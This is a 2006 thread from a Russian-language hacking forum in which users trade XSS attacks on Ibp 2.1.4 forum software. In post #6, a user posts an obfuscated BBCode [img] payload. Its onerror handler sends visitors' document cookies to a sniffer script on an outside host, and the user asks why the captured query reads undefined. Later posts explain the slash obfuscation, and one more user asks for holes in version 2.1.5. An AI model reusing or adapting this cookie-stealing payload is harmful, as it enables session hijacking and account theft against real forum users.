HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Уязвимость для Ibp 2.1.4.
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость для Ibp 2.1.4.
  #1  
Старый 20.03.2006, 17:29
Medigan
Новичок
Регистрация: 12.03.2006
Сообщений: 10
С нами: 10612873

Репутация: 0
По умолчанию Уязвимость для Ibp 2.1.4.
Люди плиз подскажите есть ли какие нибудь уязвимости ( Желательно Xss) для форумов Ibp 2.1.4.?
Заранее спасибо.
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 20.03.2006, 18:16
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию
мляяяяя
http://www.google.com/custom?hl=en&i...CURITY.NNOV.ru

КОГДА ЭТО ЗАКОНЧИТСЯ???
 

  #3  
Старый 20.03.2006, 18:16
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
С нами: 10946149

Репутация: 116


По умолчанию
 

  #4  
Старый 20.03.2006, 18:20
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами: 11217866

Репутация: 3812


По умолчанию
ТУТ смотри....
__________________
 

  #5  
Старый 20.03.2006, 18:36
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
С нами: 10997666

Репутация: 1320


По умолчанию
 

  #6  
Старый 20.03.2006, 20:36
Medigan
Новичок
Регистрация: 12.03.2006
Сообщений: 10
С нами: 10612873

Репутация: 0
По умолчанию
Спасибо, надо бы это добавить в топик про полный анализ Ibp, а то я там и искал.
Но возникла проблема.
После вставки этого кода
Код HTML:
[img]/[snapback]	onerror=document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg/.source.replace(/x/g,String.fromCharCode(47))+String.fromCharCode(63)+document.cookies	tyle=visibility:hidden=	[/snapback].gif[/img]
Приходят куки на сниффер, но в поле QUERY пишет undefined
Код HTML:
QUERY=undefined
И еще можно тупой вопрос?
У нас есть
Код HTML:
http:xxantichat.ruxcgi-binxs.jpg/
Тут заменен слэш на X, я смотрел различные кодировки для него, но нигде не видел код в виде буквы X. Где можно поподробней про это прочитать?
Последний раз редактировалось Medigan; 20.03.2006 в 20:47..
 

  #7  
Старый 20.03.2006, 20:55
podkashey
Познавший АНТИЧАТ
Регистрация: 18.06.2005
Сообщений: 1,004
С нами: 10997666

Репутация: 1320


По умолчанию
Вот здесь можно прочитать подробнее:
Цитата:
.source.replace(/x/g,String.fromCharCode(47))
 

  #8  
Старый 20.03.2006, 21:02
Medigan
Новичок
Регистрация: 12.03.2006
Сообщений: 10
С нами: 10612873

Репутация: 0
По умолчанию
Понял, сенксь...
 

  #9  
Старый 21.03.2006, 00:56
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами: 10646246

Репутация: 34
По умолчанию
а для форума Ibp 2.1.5. кто нить знает уязвимость?
 

  #10  
Старый 22.03.2006, 15:15
Medigan
Новичок
Регистрация: 12.03.2006
Сообщений: 10
С нами: 10612873

Репутация: 0
По умолчанию
Так никто не знает почему куки неизвестны? Это случайно не хорошо настроенный Internet Explorer?
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
какОй трой ИСпоЛЬзоваТЬ длЯ поЛНого УПРАвЛЕиЕ уд.КОМПОМ? UnKn0wN Уязвимости Mail-сервис 32 08.04.2006 04:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.